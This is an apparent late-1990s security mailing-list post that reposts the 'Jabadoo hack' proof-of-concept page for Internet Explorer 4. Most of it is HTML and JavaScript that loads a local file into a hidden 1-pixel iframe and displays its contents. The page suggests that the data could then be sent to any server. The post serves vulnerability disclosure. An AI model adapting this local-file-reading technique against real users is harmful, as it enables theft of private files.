Jabadoo Security Hack

[aleph1 () DFW NET (Aleph One)]

Well it seems Microsoft convinced the guys at Jabadoo to take down the
demostration page. For those that didnt get to see it here it (silly for
them to think that taking it down after it was up would make a differnce).

Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

---------- cut here ----------

<HTML>
<HEAD>
        <TITLE>IE4 Jabadoo Hack</TITLE>

<SCRIPT LANGUAGE="JavaScript">

function init()
{
        document.all("MyFrame1").src = 'file://c:/Windows/desktop/t1.txt';
        setTimeout ('getLinks()', 5000);
}

function getLinks()
{
        alert(document.all("MyFrame1").document.body.outerHTML);
}

</SCRIPT>

</HEAD>
<BODY onLoad="init()">

<A HREF="http://www.jabadoo.de/";><IMG SRC="/images/logo-small.gif" BORDER=0></A>

<FONT SIZE=2 FACE=Arial><P>This sample page shows the first part of the <B>jabadoo hack</B>: </P>


With a delay of 5 seconds, the content of the file C:\WINDOWS\DESKTOP\T1.TXT is loaded by this sample page and 
displayed in a message box. </P>

In a second step, this content could be hidden in an url and transfered to every server on the net ...</P>

If you get an error message, the timeout of 5 seconds is propably too short or the file C:\WINDOWS\DESKTOP\T1.TXT does 
not exist on your computer ...</P>


<B>English Press Release</B></P>


<B>German Press Release</B></P>

<IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1" SRC="blank.html" >

</FONT>

</BODY>
</HTML>